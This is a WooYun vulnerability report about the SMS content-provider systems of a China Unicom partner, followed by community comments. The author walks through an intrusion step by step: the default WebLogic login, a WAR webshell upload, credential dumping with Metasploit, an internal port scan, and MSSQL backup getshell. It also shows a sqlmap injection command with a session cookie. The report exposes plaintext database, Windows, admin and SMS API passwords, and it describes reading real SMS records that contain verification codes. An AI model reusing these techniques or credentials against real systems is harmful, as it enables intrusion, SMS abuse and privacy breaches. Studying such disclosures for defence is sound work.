当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157221

漏洞标题:中国联通某短信业务服务商CP系统多处漏洞打包可以控制上行号收发短信+内网真的漫游了(泄漏过上千万条短信/已发现黑客后门)

相关厂商:中国联通

漏洞作者: 殺器王子

提交时间:2015-12-01 11:36

修复时间:2016-01-18 13:20

公开时间:2016-01-18 13:20

漏洞类型:文件包含

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

为时三天,感谢红老师大力支持陪我走过无数坑。。。。
该洞可以更深入的。。。。

详细说明:

首先http://**.**.**.**:9080/console/ 存在弱口令

weblogic/weblogic


1.png

得知是库站分离,当前服务器ip是**.**.**.**,当然这是后话了
服务器java版本安全级别比较低,且该版本比较旧,部分功能没用加载出来。
当时因为服务器问题,很多war没用部署成功,后来发现别人了后门,证明这里的确是可以上传的,然后摸索了半天发现

2.png

3.png


上传文件后,要开启一个什么鬼服务才能成功执行文件,且不是所有war的后门都支持。坑啊!

4.png

成功写入一句话,权限很大可以直接添加用户。且根据端口判断只有

5.png

连上服务器发现另一个内网中的数据,当时通过判断该网段内只有4台服务器。(后来又新启动了2台是什么情况。。。)

6.jpg

可以在上面找到很多备份网站的源码,且翻到管理员桌面的好东西,在目录下找了一些配置文件发现

URL="jdbc:microsoft:sqlserver**.**.**.**:2433"/>
    <JDBCConnectionPool
        DriverName="com.microsoft.jdbc.sqlserver.SQLServerDriver"
        Name="SystemPool" Password="{3DES}s/BAZAyTsg4XOsbn1xTMeg=="


JMail.ContentType = "text/html" '邮件正文格式
JMail.MailServerUserName = "unisk" '登录用户名
JMail.MailServerPassWord = "*****先马赛克一下" '登录密码
JMail.MailDomain = "**.**.**.**" '域名
JMail.AddRecipient "portal@**.**.**.**","portal" '收信人


com.sms.database.key0.driver =com.microsoft.jdbc.sqlserver.SQLServerDriver
com.sms.database.key0.path = jdbc:microsoft:sqlserver**.**.**.**:1433;DatabaseName=SmsClub
com.sms.database.key0.user = smsclub
com.sms.database.key0.pass = dbunisk@123


bindaddr=**.**.**.**
dbConString=jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=smdbc
dbDrvString=com.microsoft.jdbc.sqlserver.SQLServerDriver
dbUser=dbunisk
dbPwd=dbunisk4e3w4s3a
mincon=2
maxcon=30


感觉可以撸无数个内网了。。
接着利用MSF的getpass导出了当前管理密码

* 用户: uniskwap1
* 域  : WIN-FJFHVQ6H85H
* 密码: [Unisk@014]


7.jpg

一个日志文件让我坚信继续搞,可以控制短信。。

msf auxiliary(smb_version) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set THREADS 24
THREADS => 24
msf auxiliary(tcp) > set PORTS 21, 22, 23, 80, 1433, 2433, 3389, 3306, 1521, 8080, 8090, 9080, 43958, 4899, 15001
PORTS => 21, 22, 23, 80, 1433, 2433, 3389, 3306, 1521, 8080, 8090, 9080, 43958, 4899, 15001
msf auxiliary(tcp) > set RHOSTS **.**.**.**/24
RHOSTS => **.**.**.**/24
msf auxiliary(tcp) > run -j
[*] Auxiliary module running as background job
[*] **.**.**.**:23 - TCP OPEN
[*] **.**.**.**:22 - TCP OPEN
[*] **.**.**.**:80 - TCP OPEN
[*] **.**.**.**:23 - TCP OPEN
[*] **.**.**.**:22 - TCP OPEN
[*] **.**.**.**:80 - TCP OPEN
[*] Scanned  32 of 256 hosts (12% complete)
[*] Scann


继续扫

8.jpg

发现内网的**.**.**.**38和当前服务器网站ip服务是同样的,且138才是真正的业务控制服务器。通过同样的漏洞拿下138的权限

9.jpg

10.jpg

发现138服务器有4个网卡,说明同时处在4个内网中。
又getpass

UserName: uniskwap1
LogonDomain: SVCTAG-6J8G43X
password: Uniskqixiang33


果然138才是关键,拿到后台密码
admin | wx@2015

12.jpg

支持批量推送短信,彩信,等等。

11.jpg


111.jpg


其中

13.jpg


暴露大量短信接口

**.**.**.**/mms/doubleConfirm?
注册名    DGh39An5 密码  dgH39aN5  服务名称  联通时科彩信二次确认 备注 1065552266
http://**.**.**.**/sms/sms_call_back?
注册名    open 密码  sms@2015*  服务名称  模板短信 备注 1065552200001
服务ip **.**.**.**,**.**.**.**,**.**.**.**,
http://**.**.**.**/smsPlatReceive/receiveSmsResult?
注册名    test 密码  20150525  服务名称smsPlat  模板短信 备注 
服务ip **.**.**.**,**.**.**.**,**.**.**.**,**.**.**.**,**.**.**.**,
http://**.**.**.**/sms/txz_ota_10655581?
注册名    TXZ_OTA 密码  Unisk!2015@  服务名称通行证OTA  模板短信 备注 106555222
服务ip **.**.**.**,**.**.**.**,**.**.**.**,


先看看目前网络拓扑图

14.png


15.jpg


上面也有主动备份源码且还有cp客户端。
目前138已经没什么利用价值,看下一个
前面提到的

URL="jdbc:microsoft:sqlserver**.**.**.**:2433"/>
    <JDBCConnectionPool
        DriverName="com.microsoft.jdbc.sqlserver.SQLServerDriver"
        Name="SystemPool" Password="{3DES}s/BAZAyTsg4XOsbn1xTMeg=="


该解密比较麻烦,采用weblogic的3DES加密。解密比较费时,解密后利用sqlsever差异备份getshell,

17.jpg

16.jpg

然后装了360,苦于无法提权,服务器打了大量的补丁很是蛋疼,但是查看进程的时候发现了有点不对劲。

17.png


发现多了一个svc0st.exe的进程,且ip指向一个美国服务器的ip,而且直接访问是跳转的3322多页面,很明显是被挂马了。
但是不晓得是怎么绕过360的。

18.png

可以看的该黑客早在2015年8月份就已经拿下权限,且在一个月后就留下后门CatRoot2(键盘记录器)。有人说该文件是系统文件,有的说是后门,但是我看创建时间还是比较可疑的,推荐自查一下。
什么?你说并没有什么卵用,最后才是高潮你懂吧。

19.png

20.jpg


21.jpg

当前字段截止当前一共是111041642条记录。且该数据一直在实时更新中,其中包含了的一些通行证验证码,某些联通业务登陆的随机密码。
到这里我已经日不动了。。。。上面泄漏的信息可以再深挖其他的内网。

漏洞证明:

接上,根据上面拿到的某短信接口

http://**.**.**.**/smsPlatReceive/receiveSmsResult?
注册名    test 密码  20150525  服务名称smsPlat  模板短信 备注


—url="http://**.**.**.**/smsPlatSend/list" -p "sendNumber" —data="pageNum=1&numPerPage=20&orderField=&orderDirection=&sendNumber=17604174024&smsAccountName=&startDate=&endDate=&timeType=" —dbms=mysql —cookie="JSESSIONID=5931296F5BA8AE18E02A0DEAB572E706; rememberMe=7tveXX7X2EkDQS+0zTcQsngvsd2toNWqw34VuCGbaEsdQmil3ZD4Oc2jM5hJAOaN7nQVapJYvqpHNCwBHx+6dhUzBXTwovF2ptdiiyPFdIN9OTUcN5y+B0qv8foMZtsaOhlidWgu65eJvnavV5PH7gWaTPMpAZysSpN22qa7XIa+N2TYoyftlp3KidznQ5sUyDNUrKRWZekcCdMwdQhq8OuWvJ2v+Qp3qX7wehtdMT6de4VQCoSWnknCgFq6nOXX8Z0OsC1+pXDQkHYVV2u0tyu2L2Ykz61If6D2ojxW5Nz9vmcN1bjgJywjdzegs5Q1XwXWzQO46VRWalXaQ7cdvt/zSq6EWskhFQcKPGLuC2D+8y8ArtogL/0i69DAFYOXlBgU79qG58rehS0aRHAsFmlqM1jA9ougVngo3utctcLQNsqRXX5pzvWlcK96uU4bOGBC6L8TrqyXq0pLIIosSuAQX3H42k+VyKwybSQZyRk=" —current-db -D "unisk_internet_market"


发现**.**.**.**该管理后台存在弱口令+注入,

22.png

23.png


其中先跑弱口令,

24.png


test | 11111111


25.jpg

发现了羞羞的内容,发现该平台不但可以推送短信,还可以收短信

26.jpg

这个是该账号发送的短信号码。
这里是收到的短信

27.png

28.png

每个账号对应相应的上行号码(发送号码),该账号只能看到自己的上行号。
可以看到该账号支持发送短信至少还有1万次。
用来联通的号码推送广告,url,彩信,风险挺大的。。。

修复方案:

不要让黑产永远都比你快一步

版权声明:转载请注明来源 殺器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-12-04 13:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-01 11:39 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2476 漏洞数:433 | 最近我在追 美丽的秘密 这部电视剧)

    求红老师id

  2. 2015-12-01 11:46 | 土夫子 ( 普通白帽子 | Rank:399 漏洞数:75 | 看似山穷水尽,终将柳喑花明)

    求红老师id

  3. 2015-12-01 12:00 | 坏男孩-A_A ( 路人 | Rank:19 漏洞数:9 | 膜拜学习中)

    求红老师id

  4. 2015-12-01 12:23 | Mark0smith ( 实习白帽子 | Rank:99 漏洞数:36 )

    求红老师id

  5. 2015-12-01 12:25 | 小龙 ( 普通白帽子 | Rank:1369 漏洞数:337 | 乌云有着这么一群人,在乌云学技术,去某数...)

    求红老师id

  6. 2015-12-01 12:26 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    求红老师id

  7. 2015-12-01 12:32 | scanf ( 核心白帽子 | Rank:1334 漏洞数:193 | 。)

    求红老师id

  8. 2015-12-01 12:41 | 梧桐树下 ( 普通白帽子 | Rank:491 漏洞数:83 | 一大波洞正在过来……)

    求红老师id

  9. 2015-12-01 12:47 | hecate ( 普通白帽子 | Rank:691 漏洞数:105 | ®高级安全工程师 | WooYun认证√)

    @红客十年

  10. 2015-12-01 12:54 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    我猜是 @RedFree

  11. 2015-12-01 12:54 | hecate ( 普通白帽子 | Rank:691 漏洞数:105 | ®高级安全工程师 | WooYun认证√)

    @梧桐树下 @scanf @大师兄 @小龙 @Mark0smith @坏男孩-A_A @土夫子 @我的邻居王婆婆 红老师在这 @RedFree

  12. 2015-12-01 13:38 | 小龙 ( 普通白帽子 | Rank:1369 漏洞数:337 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @hecate 大叔,别闹,去吃你的泡菜去吧,思密达

  13. 2015-12-01 13:44 | oneplusone ( 实习白帽子 | Rank:33 漏洞数:13 | 三十功名尘与土,八千里路云和月。莫等闲、...)

    求红老师id

  14. 2015-12-01 13:44 | px1624 ( 普通白帽子 | Rank:1072 漏洞数:180 | px1624)

    红老师是谁

  15. 2015-12-01 14:00 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2942 漏洞数:582 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @Mark0smith @坏男孩-A_A @土夫子 @oneplusone @px1624 @梧桐树下 @小龙 @我的邻居王婆婆 我大乌云的洪老师 @RedFree 大家都不知道?

  16. 2015-12-01 14:10 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子,你可以在这里提交你发现的漏...)

    彻夜在床上指导白帽子写脚本的红老师?

  17. 2015-12-01 14:10 | zzR 认证白帽子 ( 普通白帽子 | Rank:1394 漏洞数:123 | 收wb 1:5 无限量收 [平台担保])

    这么说 红老师 是大 黑阔咯

  18. 2015-12-01 14:16 | prolog ( 普通白帽子 | Rank:580 漏洞数:111 | Rank:8888 漏洞数:1024 | 低调求发展)

    红音萤

  19. 2015-12-01 14:21 | 机器猫 ( 普通白帽子 | Rank:1240 漏洞数:262 | 爱生活、爱腾讯、爱网络!)

    求红老师id

  20. 2015-12-01 14:23 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    求红老师id

  21. 2015-12-01 14:23 | boooooom 认证白帽子 ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)

    尊敬的红老师!

  22. 2015-12-01 14:38 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:322 | 国内信息安全任重而道远,还需要厂商和白帽...)

    尊敬的红老师!

  23. 2015-12-01 14:44 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  24. 2015-12-01 14:49 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)

    求红老师id

  25. 2015-12-01 15:28 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    打雷了

  26. 2015-12-01 15:41 | 泪雨无魂 ( 普通白帽子 | Rank:195 漏洞数:50 )

    求红老师id

  27. 2015-12-01 15:43 | PiaCa ( 普通白帽子 | Rank:137 漏洞数:11 | 简单点!啪......嚓~~)

    红老师已经取代苍老师的地位了

  28. 2015-12-01 16:08 | 小龙 ( 普通白帽子 | Rank:1369 漏洞数:337 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @爱上平顶山 吓得我赶紧把他关注了

  29. 2015-12-01 18:19 | an0nym0u5 ( 普通白帽子 | Rank:255 漏洞数:39 )

    后排围观内网真的漫游了~

  30. 2015-12-01 19:46 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    吃惊

  31. 2015-12-01 19:59 | imp0rt ( 普通白帽子 | Rank:109 漏洞数:51 | 剑影。。。)

    红老师已经取代苍老师的地位了。

  32. 2015-12-01 21:06 | Q1NG ( 普通白帽子 | Rank:111 漏洞数:21 | 临 兵 斗 者 皆 阵 列 前 行 !)

    求红老师id

  33. 2015-12-01 21:53 | 黑吃黑 ( 普通白帽子 | Rank:143 漏洞数:30 | 倚楼听风雨,淡看江湖路...)

    为何联通那么坑,重视点用户的信息好吗 卧槽

  34. 2015-12-01 23:18 | Weiy、 ( 普通白帽子 | Rank:105 漏洞数:23 | 为了梦想我会一直前行、)

    红老师已经取代苍老师的地位了

  35. 2015-12-01 23:24 | niexinming ( 普通白帽子 | Rank:156 漏洞数:30 | 好好学习,天天日站)

    求红老师id

  36. 2015-12-04 15:03 | 哎呀 ( 实习白帽子 | Rank:81 漏洞数:12 | 忙啊!!!)

    哎!!

  37. 2015-12-24 14:18 | 小红猪 ( 普通白帽子 | Rank:285 漏洞数:48 | little red pig!)

    666